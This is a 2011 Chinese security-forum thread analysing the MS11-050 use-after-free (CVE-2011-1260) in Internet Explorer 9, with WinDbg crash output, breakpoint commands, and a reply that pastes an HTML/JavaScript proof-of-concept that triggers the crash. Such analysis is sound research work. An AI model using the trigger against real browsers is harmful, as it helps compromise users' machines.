-
-
[讨论+求助]MS11-050中的CVE-2011-1260
-
发表于: 2011-8-17 18:00
-
这个漏洞在IE8中我已经调试过了,msf中已有ruby代码了,下面这篇blog很详细
http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
但正如作者所说:6 and 9 are also affected, but I didn't make a working exploit for them。因为也没其他关于IE9的漏洞POC,所以就分析下了~~
在IE9中调试,设置了跟IE8中类似的3个断点后,
从下面的输出来看(+反汇编逆向),下面的 ecx应该就是CObjectElement,但是前面设置的断点输出居然得不到这个CObjectElement的信息,edi对应的CTreeNode到是在前面有对应的CTreeNode::CTreeNode输出。
(e58.25c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=001601ee edx=00000000 esi=022fbf90 edi=0015b4c8
eip=6a38a7ed esp=022fbf70 ebp=022fbf80 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::ComputeFormats+0xa1:
6a38a7ed 8b82c4000000 mov eax,dword ptr [edx+0C4h] ds:0023:000000c4=????????
0:005> kb
ChildEBP RetAddr Args to Child
022fbf80 6a38c069 00000000 0015b4c8 00000000 MSHTML!CTreeNode::ComputeFormats+0xa1
022fc550 6a393017 00000000 0015b4c8 022fc590 MSHTML!CTreeNode::ComputeFormatsHelper+0x40
022fc560 6a211ea8 00106b58 00000007 00106b10 MSHTML!CTreeNode::GetFancyFormat+0x32
022fc590 6a2a7ede 00000000 00000007 00164340 MSHTML!CRecalcLinePtr::RecalcMargins+0x311
022fcd30 6a109fa1 00106b58 00000030 00000003 MSHTML!CDisplay::RecalcLines+0xa6a
022fcdfc 6a2a5208 00000033 ffffffff 022fcd70 MSHTML!CDisplay::WaitForRecalc+0x27e
022fce40 6a4c2a7c 022fcee8 000eaea8 00000000 MSHTML!CFlowLayout::Notify+0x834
022fce54 6a4c28d9 000eaea8 00119e04 022fcee8 MSHTML!NotifyElement+0x78
022fceb0 6a4c2870 03dd31f8 00119e04 022fcee8 MSHTML!CMarkup::SendNotification+0x5b
022fced4 6a38776f 022fcee8 000eaea8 03dd31f8 MSHTML!CMarkup::Notify+0x102
我设置的3个断点如下:
bu mshtml!CObjectElement::CreateElement+0xf ".printf \"mshtml!CObjectElement::CreateElement allocate CElement at %08x,CTreeNode at %08x, CElement vtable at %08x\\n\", eax, poi(eax+1c), poi(eax); g"
bu mshtml!CTreeNode::CTreeNode+0x48 ".printf \"mshtml!CTreeNode::CTreeNode allocate CTreeNode at %08x, CElement at %08x, CElement vtable at %08x\\n\", esi, poi(esi), poi(poi(esi));g"
bu mshtml!CTreeNode::Release ".printf \"mshtml!CTreeNode::Release, CTreeNode at %08x, CElement at %08x, CElement vtable at%08x\\n\", edx, poi(edx), poi(poi(edx)); .printf \"mshtml!CTreeNode::Release, CTreeNode at %08x, CElement at %08x, CElement vtable at %08x\\n\\n\", poi(poi(edx)+1c), poi(edx), poi(poi(edx)); g"
IE版本为9.0.8112.16421
另一篇poc可以在这里找到
http://spa-s3c.blogspot.com/2011/06/spas3c-sv-005ie89-use-after-free.html
也许是我哪个地方理解错了? 有在分析的朋友,给指点下~~
http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
但正如作者所说:6 and 9 are also affected, but I didn't make a working exploit for them。因为也没其他关于IE9的漏洞POC,所以就分析下了~~
在IE9中调试,设置了跟IE8中类似的3个断点后,
从下面的输出来看(+反汇编逆向),下面的 ecx应该就是CObjectElement,但是前面设置的断点输出居然得不到这个CObjectElement的信息,edi对应的CTreeNode到是在前面有对应的CTreeNode::CTreeNode输出。
(e58.25c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=001601ee edx=00000000 esi=022fbf90 edi=0015b4c8
eip=6a38a7ed esp=022fbf70 ebp=022fbf80 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::ComputeFormats+0xa1:
6a38a7ed 8b82c4000000 mov eax,dword ptr [edx+0C4h] ds:0023:000000c4=????????
0:005> kb
ChildEBP RetAddr Args to Child
022fbf80 6a38c069 00000000 0015b4c8 00000000 MSHTML!CTreeNode::ComputeFormats+0xa1
022fc550 6a393017 00000000 0015b4c8 022fc590 MSHTML!CTreeNode::ComputeFormatsHelper+0x40
022fc560 6a211ea8 00106b58 00000007 00106b10 MSHTML!CTreeNode::GetFancyFormat+0x32
022fc590 6a2a7ede 00000000 00000007 00164340 MSHTML!CRecalcLinePtr::RecalcMargins+0x311
022fcd30 6a109fa1 00106b58 00000030 00000003 MSHTML!CDisplay::RecalcLines+0xa6a
022fcdfc 6a2a5208 00000033 ffffffff 022fcd70 MSHTML!CDisplay::WaitForRecalc+0x27e
022fce40 6a4c2a7c 022fcee8 000eaea8 00000000 MSHTML!CFlowLayout::Notify+0x834
022fce54 6a4c28d9 000eaea8 00119e04 022fcee8 MSHTML!NotifyElement+0x78
022fceb0 6a4c2870 03dd31f8 00119e04 022fcee8 MSHTML!CMarkup::SendNotification+0x5b
022fced4 6a38776f 022fcee8 000eaea8 03dd31f8 MSHTML!CMarkup::Notify+0x102
我设置的3个断点如下:
bu mshtml!CObjectElement::CreateElement+0xf ".printf \"mshtml!CObjectElement::CreateElement allocate CElement at %08x,CTreeNode at %08x, CElement vtable at %08x\\n\", eax, poi(eax+1c), poi(eax); g"
bu mshtml!CTreeNode::CTreeNode+0x48 ".printf \"mshtml!CTreeNode::CTreeNode allocate CTreeNode at %08x, CElement at %08x, CElement vtable at %08x\\n\", esi, poi(esi), poi(poi(esi));g"
bu mshtml!CTreeNode::Release ".printf \"mshtml!CTreeNode::Release, CTreeNode at %08x, CElement at %08x, CElement vtable at%08x\\n\", edx, poi(edx), poi(poi(edx)); .printf \"mshtml!CTreeNode::Release, CTreeNode at %08x, CElement at %08x, CElement vtable at %08x\\n\\n\", poi(poi(edx)+1c), poi(edx), poi(poi(edx)); g"
IE版本为9.0.8112.16421
另一篇poc可以在这里找到
http://spa-s3c.blogspot.com/2011/06/spas3c-sv-005ie89-use-after-free.html
也许是我哪个地方理解错了? 有在分析的朋友,给指点下~~
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
ie6没试过~~ ie7和ie8和ie9应该都是可以的~~ 我就用的就是那两个POC啊
至于你遇到的不能触发问题,我好像一开始也遇到过~~原因未知, 但在我这儿重装IE后貌似就解决了问题~~~~  <html> <body> <script language='javascript'> document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>"; document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>"; document.body.innerHTML += "AAAAAAA"; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>"; </script> </body> </html> <STYLE> object{ float: left; } </STYLE> <acronym> hggssssssssssssssssssssssssddddddddddddddddddddddddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadddddddddddddddddddddddddddddddddddddddddddddddddddddddd </acronym> <object> head </object> <col> ccc </col> <div style = 'layout-grid-char: 35735636357357354ex;'> aaaaaa </div> |
|
|
|
|
|
 ,.,.,.,.,.,.
|
|
|
lz从exploitor群一直问到看雪哈
|
|
|
额~~ 太弱了, 到处求助~~
|
|
|
|
|
|
|
